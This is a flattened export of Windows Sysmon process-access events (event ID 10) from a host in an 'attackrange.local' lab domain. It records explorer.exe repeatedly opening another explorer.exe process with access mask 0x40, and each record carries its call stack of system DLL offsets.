16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 